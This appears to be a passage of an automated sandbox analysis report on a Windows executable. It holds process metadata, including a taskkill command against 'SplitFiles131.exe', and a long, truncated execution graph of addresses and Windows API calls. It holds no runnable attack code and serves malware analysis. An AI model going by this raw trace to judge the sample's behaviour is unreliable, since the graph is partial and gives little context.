                                        Target ID:8
                                        Start time:08:47:39
                                        Start date:05/01/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7fcd70000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:9
                                        Start time:08:47:39
                                        Start date:05/01/2023
                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                        Wow64 process (32bit):true
                                        Commandline:taskkill /im "SplitFiles131.exe" /f
                                        Imagebase:0xf40000
                                        File size:74752 bytes
                                        MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:22.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:1.9%
                                          Total number of Nodes:1454
                                          Total number of Limit Nodes:16
                                          execution_graph 6121 409ec0 6130 4092bc 6121->6130 6124 402f24 5 API calls 6125 409edd 6124->6125 6126 403198 4 API calls 6125->6126 6127 409efc 6126->6127 6128 403198 4 API calls 6127->6128 6129 409f04 6128->6129 6139 405678 6130->6139 6132 4092d7 6134 409305 6132->6134 6145 407060 6132->6145 6136 403198 4 API calls 6134->6136 6135 4092f5 6138 4092fd MessageBoxA 6135->6138 6137 40931a 6136->6137 6137->6124 6138->6134 6140 403154 4 API calls 6139->6140 6141 40567d 6140->6141 6142 405695 6141->6142 6143 403154 4 API calls 6141->6143 6142->6132 6144 40568b 6143->6144 6144->6132 6146 405678 4 API calls 6145->6146 6147 40706f 6146->6147 6148 407083 6147->6148 6149 407075 6147->6149 6151 407093 6148->6151 6153 40709f 6148->6153 6150 40322c 4 API calls 6149->6150 6154 407081 6150->6154 6156 407024 6151->6156 6163 4032b8 6153->6163 6154->6135 6157 40322c 4 API calls 6156->6157 6158 407033 6157->6158 6159 407050 6158->6159 6160 4067b8 CharPrevA 6158->6160 6159->6154 6161 40703f 6160->6161 6161->6159 6162 4032fc 18 API calls 6161->6162 6162->6159 6164 403278 18 API calls 6163->6164 6165 4032c2 6164->6165 6165->6154 5989 409c42 5990 409c67 5989->5990 5991 4076d0 InterlockedExchange 5990->5991 5992 409c89 5991->5992 5993 409c96 5992->5993 5994 4096d4 18 API calls 5992->5994 5995 40740c 37 API calls 5993->5995 5994->5993 5996 409ca6 5995->5996 6005 407464 SetEndOfFile 5996->6005 5999 40740c 37 API calls 6000 409cbc 5999->6000 6009 407480 WriteFile 6000->6009 6003 4025ac 4 API calls 6004 409ce5 6003->6004 6006 407474 6005->6006 6007 40747b 6005->6007 6008 407390 35 API calls 6006->6008 6007->5999 6008->6007 6010 4074a0 6009->6010 6011 4074a7 6009->6011 6012 407390 35 API calls 6010->6012 6013 4074b8 6011->6013 6014 4072f0 34 API calls 6011->6014 6012->6011 6013->6003 6014->6013 6166 408cc2 6167 408cb4 6166->6167 6168 408c50 Wow64RevertWow64FsRedirection 6167->6168 6169 408cbc 6168->6169 6170 408cc4 SetLastError 6171 408ccd 6170->6171 6419 402b48 RaiseException 6420 40294a 6421 402952 6420->6421 6422 4035f8 4 API calls 6421->6422 6423 402967 6421->6423 6422->6421 6015 408a4c 6016 408a70 6015->6016 6017 408950 18 API calls 6016->6017 6018 408a79 6017->6018 6178 402ccc 6181 402cdd 6178->6181 6182 402cfe 6178->6182 6179 402d88 RtlUnwind 6180 403154 4 API calls 6179->6180 6180->6182 6181->6179 6181->6182 6183 402b28 RaiseException 6181->6183 6184 402d7f 6183->6184 6184->6179 6185 403acc ReadFile 6186 403aea 6185->6186 6187 403aed GetLastError 6185->6187 6019 406e4f 6020 406e5c SetErrorMode 6019->6020 6021 406650 IsDBCSLeadByte 6022 406668 6021->6022 6188 4024d0 6189 4024e4 6188->6189 6193 4024e9 6188->6193 6190 401918 4 API calls 6189->6190 6190->6193 6191 402518 6203 402300 6191->6203 6192 40250e RtlEnterCriticalSection 6192->6191 6193->6191 6193->6192 6195 4024ed 6193->6195 6197 402525 6199 402581 6197->6199 6200 402577 RtlLeaveCriticalSection 6197->6200 6198 401fd4 14 API calls 6201 402531 6198->6201 6200->6199 6201->6197 6213 40215c 6201->6213 6204 402314 6203->6204 6205 402335 6204->6205 6206 4023b8 6204->6206 6207 402344 6205->6207 6227 401b74 6205->6227 6206->6207 6208 401d80 9 API calls 6206->6208 6211 402455 6206->6211 6230 401e84 6206->6230 6207->6197 6207->6198 6208->6206 6211->6207 6212 401d00 9 API calls 6211->6212 6212->6207 6214 40217a 6213->6214 6215 402175 6213->6215 6217 4021ab RtlEnterCriticalSection 6214->6217 6221 4021b5 6214->6221 6222 40217e 6214->6222 6216 401918 4 API calls 6215->6216 6216->6214 6217->6221 6218 4021c1 6223 4022e3 RtlLeaveCriticalSection 6218->6223 6224 4022ed 6218->6224 6219 402270 6219->6218 6226 401d00 7 API calls 6219->6226 6220 402244 6220->6222 6225 401d80 7 API calls 6220->6225 6221->6218 6221->6219 6221->6220 6222->6197 6223->6224 6224->6197 6225->6222 6226->6218 6228 40215c 9 API calls 6227->6228 6229 401b95 6228->6229 6229->6207 6235 401768 6230->6235 6232 401e99 6233 401ea6 6232->6233 6234 401dcc 9 API calls 6232->6234 6233->6206 6234->6233 6237 401787 6235->6237 6236 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6236->6237 6237->6236 6238 40183b 6237->6238 6239 40132c LocalAlloc 6237->6239 6241 401821 6237->6241 6244 4017d6 6237->6244 6240 4015c4 VirtualAlloc 6238->6240 6242 4017e7 6238->6242 6239->6237 6240->6242 6243 40150c VirtualFree 6241->6243 6242->6232 6243->6242 6245 40150c VirtualFree 6244->6245 6245->6242 6246 4028d2 6247 4028da 6246->6247 6248 4035f8 4 API calls 6247->6248 6249 4028ef 6247->6249 6248->6247 6250 4025ac 4 API calls 6249->6250 6251 4028f4 6250->6251 6542 4019d3 6543 4019ba 6542->6543 6544 4019c3 RtlLeaveCriticalSection 6543->6544 6545 4019cd 6543->6545 6544->6545 6023 402654 6024 403154 4 API calls 6023->6024 6025 402614 6024->6025 6026 402632 6025->6026 6027 403154 4 API calls 6025->6027 6026->6026 6027->6026 6546 408bd4 6549 408aa4 6546->6549 6550 408aad 6549->6550 6551 403198 4 API calls 6550->6551 6552 408abb 6550->6552 6551->6550 6553 4039d6 6554 4039c8 6553->6554 6555 4037f0 VariantClear 6554->6555 6556 4039d0 6555->6556 6032 409c5d 6033 4096d4 18 API calls 6032->6033 6034 409c62 6033->6034 6036 409c67 6034->6036 6051 402f24 6034->6051 6037 4076d0 InterlockedExchange 6036->6037 6038 409c89 6037->6038 6039 409c96 6038->6039 6040 4096d4 18 API calls 6038->6040 6041 40740c 37 API calls 6039->6041 6040->6039 6042 409ca6 6041->6042 6043 407464 36 API calls 6042->6043 6044 409cb0 6043->6044 6045 40740c 37 API calls 6044->6045 6046 409cbc 6045->6046 6047 407480 36 API calls 6046->6047 6048 409cce 6047->6048 6049 4025ac 4 API calls 6048->6049 6050 409ce5 6049->6050 6052 403154 4 API calls 6051->6052 6053 402f29 6052->6053 6056 402bcc 6053->6056 6055 402f51 6055->6055 6057 402bd5 RaiseException 6056->6057 6058 402be6 6056->6058 6057->6058 6058->6055 6256 4088de 6257 4088e7 6256->6257 6258 403198 4 API calls 6257->6258 6266 408981 6258->6266 6259 4089ac 6260 4031b8 4 API calls 6259->6260 6261 408a30 6260->6261 6262 408998 6264 4032fc 18 API calls 6262->6264 6263 403278 18 API calls 6263->6266 6264->6259 6265 4032fc 18 API calls 6265->6266 6266->6259 6266->6262 6266->6263 6266->6265 5797 407464 SetEndOfFile 5798 407474 5797->5798 5799 40747b 5797->5799 5800 407390 35 API calls 5798->5800 5800->5799 6059 402e64 6060 402e69 6059->6060 6061 402e7a RtlUnwind 6060->6061 6062 402e5e 6060->6062 6063 402e9d 6061->6063 6572 402be9 RaiseException 6573 402c04 6572->6573 5975 406e6b 5976 406e5c SetErrorMode 5975->5976 6436 405b6e 6437 405b70 6436->6437 6438 405bac 6437->6438 6439 405bc3 6437->6439 6440 405ba6 6437->6440 6441 40590c 19 API calls 6438->6441 6445 404ca8 19 API calls 6439->6445 6440->6438 6442 405c18 6440->6442 6444 405bbf 6441->6444 6443 40597c 33 API calls 6442->6443 6443->6444 6447 403198 4 API calls 6444->6447 6446 405bec 6445->6446 6448 40597c 33 API calls 6446->6448 6449 405c52 6447->6449 6448->6444 6578 403fee 6579 404000 6578->6579 6580 403ff7 6578->6580 6581 403fab 4 API calls 6580->6581 6581->6579 5468 409a71 5469 409a96 5468->5469 5503 40944c 5469->5503 5471 409b28 5522 4026c4 GetSystemTime 5471->5522 5472 409a9b 5476 409ad5 5472->5476 5560 408a80 5472->5560 5475 409b2d 5523 408fd4 5475->5523 5476->5471 5479 408a80 18 API calls 5476->5479 5477 409ac0 5482 409ac8 MessageBoxA 5477->5482 5481 409b04 5479->5481 5486 409b0c MessageBoxA 5481->5486 5563 405830 5482->5563 5483 4031e8 18 API calls 5485 409b42 5483->5485 5541 408ec8 5485->5541 5486->5471 5488 409b19 5486->5488 5490 405830 19 API calls 5488->5490 5490->5471 5491 4031e8 18 API calls 5492 409b65 5491->5492 5493 40740c 37 API calls 5492->5493 5494 409b75 5493->5494 5495 4071a4 37 API calls 5494->5495 5496 409ba2 5495->5496 5497 402594 18 API calls 5496->5497 5498 409bbf 5497->5498 5499 40776c 42 API calls 5498->5499 5500 409bfe 5499->5500 5501 4079fc 40 API calls 5500->5501 5502 409c23 5501->5502 5504 409493 5503->5504 5510 40945d 5503->5510 5505 4094a0 5504->5505 5506 40949c 5504->5506 5573 406e78 GetModuleHandleA 6CAD5550 5505->5573 5507 4094a7 GetUserDefaultLangID 5506->5507 5511 40949e 5506->5511 5507->5511 5510->5504 5513 409483 5510->5513 5512 40951c 5511->5512 5515 4094e2 5511->5515 5518 4094d5 5511->5518 5514 409400 19 API calls 5512->5514 5567 409400 5513->5567 5517 40948a 5514->5517 5515->5512 5520 40950f 5515->5520 5517->5472 5519 409400 19 API calls 5518->5519 5519->5517 5521 409400 19 API calls 5520->5521 5521->5517 5522->5475 5540 408ff4 5523->5540 5525 408ec8 26 API calls 5525->5540 5526 409019 CreateDirectoryA 5527 409091 5526->5527 5528 409023 GetLastError 5526->5528 5529 40322c 4 API calls 5527->5529 5528->5540 5530 40909b 5529->5530 5533 4031b8 4 API calls 5530->5533 5531 408a80 18 API calls 5531->5540 5534 4090b5 5533->5534 5536 4031b8 4 API calls 5534->5536 5535 4070d8 19 API calls 5535->5540 5537 4090c2 5536->5537 5537->5483 5539 40585c 18 API calls 5539->5540 5540->5525 5540->5526 5540->5531 5540->5535 5540->5539 5633 406b60 5540->5633 5656 404c60 5540->5656 5659 408a50 5540->5659 5542 408ee8 5541->5542 5543 406610 19 API calls 5542->5543 5544 408f01 5543->5544 5545 40322c 4 API calls 5544->5545 5546 408f0c 5545->5546 5547 4067d8 20 API calls 5546->5547 5549 408a80 18 API calls 5546->5549 5550 4033b4 18 API calls 5546->5550 5551 40585c 18 API calls 5546->5551 5553 408f88 5546->5553 5761 408e54 5546->5761 5769 408cd8 5546->5769 5547->5546 5549->5546 5550->5546 5551->5546 5554 40322c 4 API calls 5553->5554 5555 408f93 5554->5555 5556 4031b8 4 API calls 5555->5556 5557 408fad 5556->5557 5558 403198 4 API calls 5557->5558 5559 408fb5 5558->5559 5559->5491 5561 408a50 18 API calls 5560->5561 5562 408a9c 5561->5562 5562->5477 5564 405835 5563->5564 5565 40590c 19 API calls 5564->5565 5566 405847 5565->5566 5566->5566 5568 409408 5567->5568 5572 409440 5567->5572 5569 4034c4 18 API calls 5568->5569 5568->5572 5570 40943a 5569->5570 5594 408b28 5570->5594 5572->5517 5574 406eb2 5573->5574 5575 406ebb 5573->5575 5585 403198 4 API calls 5574->5585 5576 406ec4 5575->5576 5577 406efc 5575->5577 5610 406dbc 5576->5610 5579 406dbc 6CAD6790 5577->5579 5581 406f15 5579->5581 5580 406edd 5582 406f32 5580->5582 5613 406db0 5580->5613 5581->5582 5586 406db0 20 API calls 5581->5586 5583 40322c 4 API calls 5582->5583 5587 406f3f 5583->5587 5589 406f74 5585->5589 5590 406f29 RegCloseKey 5586->5590 5591 4032fc 18 API calls 5587->5591 5592 403198 4 API calls 5589->5592 5590->5582 5591->5574 5593 406f7c 5592->5593 5593->5511 5595 408b36 5594->5595 5597 408b4e 5595->5597 5607 408ac0 5595->5607 5598 408ac0 18 API calls 5597->5598 5599 408b72 5597->5599 5598->5599 5600 4076d0 InterlockedExchange 5599->5600 5601 408b8b 5600->5601 5602 408ac0 18 API calls 5601->5602 5604 408b9e 5601->5604 5602->5604 5603 408ac0 18 API calls 5603->5604 5604->5603 5605 403278 18 API calls 5604->5605 5606 408bcd 5604->5606 5605->5604 5606->5572 5608 40585c 18 API calls 5607->5608 5609 408ad1 5608->5609 5609->5597 5611 406dc7 5610->5611 5612 406dcd 6CAD6790 5610->5612 5611->5612 5612->5580 5616 406c7c 5613->5616 5617 406ca1 RegQueryValueExA 5616->5617 5618 406ce3 5617->5618 5624 406cc1 5617->5624 5619 403198 4 API calls 5618->5619 5621 406d9c RegCloseKey 5619->5621 5620 406cdb 5622 403198 4 API calls 5620->5622 5621->5582 5622->5618 5623 403278 18 API calls 5623->5624 5624->5618 5624->5620 5624->5623 5625 4034c4 18 API calls 5624->5625 5626 406d03 RegQueryValueExA 5625->5626 5626->5617 5627 406d18 5626->5627 5627->5618 5628 403594 18 API calls 5627->5628 5629 406d5e 5628->5629 5630 406d72 5629->5630 5632 4034c4 18 API calls 5629->5632 5631 4031e8 18 API calls 5630->5631 5631->5618 5632->5630 5663 4068b8 5633->5663 5636 406b92 5638 4068b8 19 API calls 5636->5638 5640 406bde 5636->5640 5639 406ba2 5638->5639 5641 406bae 5639->5641 5643 406894 21 API calls 5639->5643 5671 40675c 5640->5671 5641->5640 5646 4068b8 19 API calls 5641->5646 5653 406bd3 5641->5653 5643->5641 5649 406bc7 5646->5649 5648 406bf3 5650 40322c 4 API calls 5648->5650 5651 406894 21 API calls 5649->5651 5649->5653 5652 406bfd 5650->5652 5651->5653 5654 4031b8 4 API calls 5652->5654 5653->5640 5693 406b34 GetWindowsDirectoryA 5653->5693 5655 406c17 5654->5655 5655->5540 5657 405174 33 API calls 5656->5657 5658 404c7e 5657->5658 5658->5540 5660 408a70 5659->5660 5751 408950 5660->5751 5664 403594 18 API calls 5663->5664 5665 4068cb 5664->5665 5666 4068e2 GetEnvironmentVariableA 5665->5666 5670 4068f5 5665->5670 5695 406c58 5665->5695 5666->5665 5667 4068ee 5666->5667 5669 403198 4 API calls 5667->5669 5669->5670 5670->5636 5690 406894 5670->5690 5672 4034b8 5671->5672 5673 40677f GetFullPathNameA 5672->5673 5674 4067a2 5673->5674 5675 40678b 5673->5675 5677 40322c 4 API calls 5674->5677 5675->5674 5676 406793 5675->5676 5678 403278 18 API calls 5676->5678 5679 4067a0 5677->5679 5678->5679 5680 406610 5679->5680 5681 40661a 5680->5681 5682 40663c 5680->5682 5699 4067b8 5681->5699 5684 40322c 4 API calls 5682->5684 5686 406645 5684->5686 5685 406621 5685->5682 5687 40662b 5685->5687 5686->5648 5703 403340 5687->5703 5689 406639 5689->5648 5718 40683c 5690->5718 5694 406b55 5693->5694 5694->5640 5696 406c66 5695->5696 5697 403594 18 API calls 5696->5697 5698 406c74 5697->5698 5698->5665 5700 4067c3 5699->5700 5701 4067bf 5699->5701 5702 4067ca CharPrevA 5700->5702 5701->5685 5702->5685 5704 403344 5703->5704 5705 4033a5 5703->5705 5706 4031e8 5704->5706 5707 40334c 5704->5707 5710 403254 18 API calls 5706->5710 5713 4031fc 5706->5713 5707->5705 5709 40335b 5707->5709 5711 4031e8 18 API calls 5707->5711 5708 403228 5708->5689 5712 403254 18 API calls 5709->5712 5710->5713 5711->5709 5715 403375 5712->5715 5713->5708 5714 4025ac 4 API calls 5713->5714 5714->5708 5716 4031e8 18 API calls 5715->5716 5717 4033a1 5716->5717 5717->5689 5725 4067d8 5718->5725 5720 40685e 5721 406866 6CF478A0 5720->5721 5722 40687b 5721->5722 5723 403198 4 API calls 5722->5723 5724 406883 5723->5724 5724->5636 5735 406684 5725->5735 5727 4067e9 5728 4067fb CharPrevA 5727->5728 5729 40680f 5727->5729 5728->5727 5730 406825 5729->5730 5731 40681a 5729->5731 5742 4034f8 5730->5742 5733 40322c 4 API calls 5731->5733 5734 406823 5733->5734 5734->5720 5737 406695 5735->5737 5736 4066f5 5738 4066f0 5736->5738 5740 406654 IsDBCSLeadByte 5736->5740 5737->5736 5739 4066b1 5737->5739 5738->5727 5739->5738 5749 406654 IsDBCSLeadByte 5739->5749 5740->5738 5743 40352a 5742->5743 5744 4034fd 5742->5744 5745 403198 4 API calls 5743->5745 5744->5743 5746 403511 5744->5746 5748 403520 5745->5748 5747 403278 18 API calls 5746->5747 5747->5748 5748->5734 5750 406668 5749->5750 5750->5739 5752 403198 4 API calls 5751->5752 5760 408981 5751->5760 5752->5760 5753 4031b8 4 API calls 5754 408a30 5753->5754 5754->5540 5755 403278 18 API calls 5755->5760 5756 408998 5757 4032fc 18 API calls 5756->5757 5759 4089ac 5757->5759 5758 4032fc 18 API calls 5758->5760 5759->5753 5760->5755 5760->5756 5760->5758 5760->5759 5762 403198 4 API calls 5761->5762 5763 408e75 5762->5763 5766 408ea2 5763->5766 5778 4032a8 5763->5778 5781 403538 5763->5781 5767 403198 4 API calls 5766->5767 5768 408eb7 5767->5768 5768->5546 5785 408c14 5769->5785 5771 408cee 5772 408cf2 5771->5772 5791 4068a8 5771->5791 5772->5546 5775 408d25 5794 408c50 5775->5794 5779 403278 18 API calls 5778->5779 5780 4032b5 5779->5780 5780->5763 5782 40353c 5781->5782 5784 403567 5781->5784 5783 403594 18 API calls 5782->5783 5783->5784 5784->5763 5786 408c22 5785->5786 5787 408c1e 5785->5787 5788 408c44 SetLastError 5786->5788 5789 408c2b Wow64DisableWow64FsRedirection 5786->5789 5787->5771 5790 408c3f 5788->5790 5789->5790 5790->5771 5792 40683c 21 API calls 5791->5792 5793 4068b2 GetLastError 5792->5793 5793->5775 5795 408c55 Wow64RevertWow64FsRedirection 5794->5795 5796 408c5f 5794->5796 5795->5796 5796->5546 6064 404071 6065 403fab 4 API calls 6064->6065 6066 40407a 6065->6066 6067 403f40 4 API calls 6066->6067 6068 404086 6067->6068 6276 402af2 6277 402afe 6276->6277 6280 402ed0 6277->6280 6281 403154 4 API calls 6280->6281 6283 402ee0 6281->6283 6282 402b03 6283->6282 6285 402b0c 6283->6285 6286 402b25 6285->6286 6287 402b15 RaiseException 6285->6287 6286->6282 6287->6286 6296 403af6 6297 403b18 6296->6297 6298 403afe WriteFile 6296->6298 6298->6297 6299 403b1c GetLastError 6298->6299 6299->6297 6300 409cf7 6301 409d27 6300->6301 6302 409d31 CreateWindowExA SetWindowLongA 6301->6302 6303 405160 33 API calls 6302->6303 6304 409d93 6303->6304 6305 4032fc 18 API calls 6304->6305 6306 409da1 6305->6306 6307 405160 33 API calls 6306->6307 6308 409dd3 6307->6308 6309 4032fc 18 API calls 6308->6309 6310 409ddc 6309->6310 6311 406908 GetCommandLineA 6310->6311 6312 409de8 6311->6312 6313 4032fc 18 API calls 6312->6313 6314 409df1 6313->6314 6315 4095bc 43 API calls 6314->6315 6316 409e03 6315->6316 6317 409e3c 6316->6317 6318 4091a4 9 API calls 6316->6318 6319 409e55 6317->6319 6323 409e4f RemoveDirectoryA 6317->6323 6318->6317 6320 409e69 6319->6320 6321 409e5e 72E69840 6319->6321 6322 409e91 6320->6322 6324 403620 4 API calls 6320->6324 6321->6320 6323->6319 6325 409e87 6324->6325 6326 4025ac 4 API calls 6325->6326 6326->6322 6582 402dfa 6583 402e26 6582->6583 6584 402e0d 6582->6584 6586 402ba4 6584->6586 6587 402bc9 6586->6587 6588 402bad 6586->6588 6587->6583 6589 402bb5 RaiseException 6588->6589 6589->6587 5462 407480 WriteFile 5463 4074a0 5462->5463 5464 4074a7 5462->5464 5465 407390 35 API calls 5463->5465 5466 4074b8 5464->5466 5467 4072f0 34 API calls 5464->5467 5465->5464 5467->5466 6590 406f82 6591 406f6c 6590->6591 6592 403198 4 API calls 6591->6592 6593 406f74 6592->6593 6594 403198 4 API calls 6593->6594 6595 406f7c 6594->6595 6069 402c08 6072 402c82 6069->6072 6073 402c19 6069->6073 6070 402c56 RtlUnwind 6071 403154 4 API calls 6070->6071 6071->6072 6073->6070 6073->6072 6076 402b28 6073->6076 6077 402b31 RaiseException 6076->6077 6078 402b47 6076->6078 6077->6078 6078->6070 5872 40720a 5873 407218 CloseHandle 5872->5873 5874 407221 5872->5874 5873->5874 5875 409d0a 5876 409d4d CreateWindowExA SetWindowLongA 5875->5876 5877 409d0d 5875->5877 5878 409d93 5876->5878 5879 405160 33 API calls 5876->5879 5877->5876 5880 4032fc 18 API calls 5878->5880 5879->5878 5881 409da1 5880->5881 5882 405160 33 API calls 5881->5882 5883 409dd3 5882->5883 5884 4032fc 18 API calls 5883->5884 5885 409ddc 5884->5885 5886 406908 GetCommandLineA 5885->5886 5887 409de8 5886->5887 5888 4032fc 18 API calls 5887->5888 5889 409df1 5888->5889 5902 4095bc 5889->5902 5891 409e03 5892 409e3c 5891->5892 5916 4091a4 5891->5916 5894 409e55 5892->5894 5898 409e4f RemoveDirectoryA 5892->5898 5895 409e69 5894->5895 5896 409e5e 72E69840 5894->5896 5897 409e91 5895->5897 5924 403620 5895->5924 5896->5895 5898->5894 5900 409e87 5901 4025ac 4 API calls 5900->5901 5901->5897 5903 4033b4 18 API calls 5902->5903 5904 4095fb 5903->5904 5905 40962d 6CF47180 5904->5905 5906 409640 CloseHandle 5905->5906 5907 409639 5905->5907 5909 409657 PeekMessageA 5906->5909 5937 409208 GetLastError 5907->5937 5910 409669 MsgWaitForMultipleObjects 5909->5910 5911 40964b TranslateMessage DispatchMessageA 5909->5911 5910->5909 5912 409680 GetExitCodeProcess CloseHandle 5910->5912 5911->5909 5913 4096a3 5912->5913 5914 403198 4 API calls 5913->5914 5915 4096ab 5914->5915 5915->5891 5917 4091fe 5916->5917 5919 4091b7 5916->5919 5917->5892 5918 4091bf Sleep 5918->5919 5919->5917 5919->5918 5920 4091cf Sleep 5919->5920 5922 4091e6 GetLastError 5919->5922 5950 408c60 5919->5950 5920->5919 5922->5917 5923 4091f0 GetLastError 5922->5923 5923->5917 5923->5919 5925 403635 5924->5925 5926 403644 5924->5926 5930 403674 5925->5930 5931 40363f 5925->5931 5933 40365a 5925->5933 5927 403655 5926->5927 5928 40365c 5926->5928 5932 403198 4 API calls 5927->5932 5929 4031b8 4 API calls 5928->5929 5929->5933 5930->5933 5935 403620 4 API calls 5930->5935 5931->5926 5934 403690 5931->5934 5932->5933 5933->5900 5934->5933 5958 4035f8 5934->5958 5935->5930 5938 404c60 33 API calls 5937->5938 5939 40924f 5938->5939 5940 4070d8 19 API calls 5939->5940 5941 40925f 5940->5941 5942 408a50 18 API calls 5941->5942 5943 409274 5942->5943 5944 40585c 18 API calls 5943->5944 5945 409283 5944->5945 5946 4031b8 4 API calls 5945->5946 5947 4092a2 5946->5947 5948 403198 4 API calls 5947->5948 5949 4092aa 5948->5949 5949->5906 5951 408c14 2 API calls 5950->5951 5952 408c76 5951->5952 5953 408c7a 5952->5953 5954 408c96 6CAD5F60 GetLastError 5952->5954 5953->5919 5955 408cb4 5954->5955 5956 408c50 Wow64RevertWow64FsRedirection 5955->5956 5957 408cbc 5956->5957 5957->5919 5959 40360a 5958->5959 5961 40361c 5959->5961 5962 4036a8 5959->5962 5961->5934 5963 403620 5962->5963 5964 403644 5963->5964 5965 40365a 5963->5965 5969 403674 5963->5969 5970 40363f 5963->5970 5966 403655 5964->5966 5967 40365c 5964->5967 5965->5959 5971 403198 4 API calls 5966->5971 5968 4031b8 4 API calls 5967->5968 5968->5965 5969->5965 5972 403620 4 API calls 5969->5972 5970->5964 5974 403690 5970->5974 5971->5965 5972->5969 5973 4035f8 4 API calls 5973->5974 5974->5965 5974->5973 6604 40958f 6605 402f24 5 API calls 6604->6605 6606 409594 6605->6606 6079 403018 6080 403070 6079->6080 6081 403025 6079->6081 6082 40302a RtlUnwind 6081->6082 6083 40304e 6082->6083 6085 402f78 6083->6085 6086 402be8 6083->6086 6087 402bf1 RaiseException 6086->6087 6088 402c04 6086->6088 6087->6088 6088->6080 5977 409e9e 5978 409e10 5977->5978 5979 4091a4 9 API calls 5978->5979 5981 409e3c 5978->5981 5979->5981 5980 409e55 5982 409e69 5980->5982 5983 409e5e 72E69840 5980->5983 5981->5980 5985 409e4f RemoveDirectoryA 5981->5985 5984 409e91 5982->5984 5986 403620 4 API calls 5982->5986 5983->5982 5985->5980 5987 409e87 5986->5987 5988 4025ac 4 API calls 5987->5988 5988->5984 4770 409820 4823 4030dc 4770->4823 4772 409836 4826 40438c 4772->4826 4774 40983b 4829 406594 4774->4829 4778 409845 4839 408d48 GetModuleHandleA 6CAD5550 GetModuleHandleA 6CAD5550 4778->4839 4798 409912 4799 40740c 37 API calls 4798->4799 4800 40991f 4799->4800 4801 4073e4 37 API calls 4800->4801 4802 409933 4801->4802 4898 403278 4802->4898 4804 409963 4807 4096d4 18 API calls 4804->4807 4808 409978 4804->4808 4805 409945 4805->4804 4939 4076d0 4805->4939 4807->4808 4809 40740c 37 API calls 4808->4809 4810 409988 4809->4810 4811 4073e4 37 API calls 4810->4811 4812 40999c 4811->4812 4813 4099b7 4812->4813 4814 4096d4 18 API calls 4812->4814 4903 40776c 4813->4903 4814->4813 4816 4099dc 4921 408830 4816->4921 4820 409a52 4821 408830 40 API calls 4822 409a1c 4821->4822 4822->4820 4822->4821 4945 403094 4823->4945 4825 4030e1 GetModuleHandleA GetCommandLineA 4825->4772 4828 4043c7 4826->4828 4946 403154 4826->4946 4828->4774 4959 405c74 4829->4959 4838 4065e0 6F7ADB20 4838->4778 4840 408d9b 4839->4840 5193 406df4 SetErrorMode 4840->5193 4845 403198 4 API calls 4846 408de0 4845->4846 4847 409764 GetSystemInfo VirtualQuery 4846->4847 4848 409818 4847->4848 4851 40978e 4847->4851 4853 409328 4848->4853 4849 4097f9 VirtualQuery 4849->4848 4849->4851 4850 4097b8 VirtualProtect 4850->4851 4851->4848 4851->4849 4851->4850 4852 4097e7 VirtualProtect 4851->4852 4852->4849 5203 406a2c 4853->5203 4855 4093b6 4856 4031b8 4 API calls 4855->4856 4858 4093d0 4856->4858 4857 406a98 20 API calls 4859 409345 4857->4859 4861 406a98 4858->4861 4859->4855 4859->4857 4860 4034f8 18 API calls 4859->4860 4860->4859 4862 406ae3 4861->4862 4863 406abf GetModuleFileNameA 4861->4863 4864 406908 GetCommandLineA 4862->4864 4865 403278 18 API calls 4863->4865 4871 406aeb 4864->4871 4866 406ae1 4865->4866 4867 406b0d 4866->4867 4868 403198 4 API calls 4867->4868 4870 406b22 4868->4870 4869 406990 18 API calls 4869->4871 4872 4031e8 4870->4872 4871->4867 4871->4869 4873 4031ec 4872->4873 4876 4031fc 4872->4876 4875 403254 18 API calls 4873->4875 4873->4876 4874 403228 4878 4071a4 4874->4878 4875->4876 4876->4874 4877 4025ac 4 API calls 4876->4877 4877->4874 4879 4071ae 4878->4879 5226 40723a 4879->5226 5229 40723c 4879->5229 4880 4071d9 4882 4071ed 4880->4882 5232 407390 GetLastError 4880->5232 4885 4072c0 GetFileSize 4882->4885 4886 4072ea 4885->4886 4887 4072da GetLastError 4885->4887 4890 40740c 4886->4890 4887->4886 4888 4072e3 4887->4888 4889 407390 35 API calls 4888->4889 4889->4886 5331 407424 SetFilePointer 4890->5331 4893 4073e4 5336 4073a4 ReadFile 4893->5336 4896 407408 4896->4798 4932 4096d4 4896->4932 4897 4072f0 34 API calls 4897->4896 4899 403254 18 API calls 4898->4899 4900 403288 4899->4900 4901 403198 4 API calls 4900->4901 4902 4032a0 4901->4902 4902->4805 4904 407779 4903->4904 4905 4073a4 37 API calls 4904->4905 4906 4077a2 4905->4906 4907 4077b6 4906->4907 4908 4073a4 37 API calls 4906->4908 4909 40585c 18 API calls 4907->4909 4910 4077cc 4907->4910 4908->4907 4909->4910 4911 4076d0 InterlockedExchange 4910->4911 4912 4077de 4911->4912 4913 4077f4 4912->4913 4915 40585c 18 API calls 4912->4915 5342 407288 SetFilePointer 4913->5342 4915->4913 4916 407803 4917 4072c0 37 API calls 4916->4917 4918 407818 4917->4918 4919 407838 4918->4919 4920 40585c 18 API calls 4918->4920 4919->4816 4920->4919 4922 4088a4 4921->4922 4925 40885e 4921->4925 5347 4079fc 4922->5347 4924 4088b8 4927 403198 4 API calls 4924->4927 4925->4922 4926 403278 18 API calls 4925->4926 4929 4034c4 18 API calls 4925->4929 4930 4031e8 18 API calls 4925->4930 4931 4079fc 40 API calls 4925->4931 4926->4925 4928 4088cd 4927->4928 4942 404bec 4928->4942 4929->4925 4930->4925 4931->4925 4933 4096f5 4932->4933 4934 4096dd 4932->4934 4936 40585c 18 API calls 4933->4936 4935 40585c 18 API calls 4934->4935 4938 4096ef 4935->4938 4937 409706 4936->4937 4937->4798 4938->4798 5458 40767c 4939->5458 4943 402594 18 API calls 4942->4943 4944 404bf7 4943->4944 4944->4822 4945->4825 4947 403164 4946->4947 4948 40318c TlsGetValue 4946->4948 4947->4828 4949 403196 4948->4949 4950 40316f 4948->4950 4949->4828 4954 40310c 4950->4954 4952 403174 TlsGetValue 4953 403184 4952->4953 4953->4828 4955 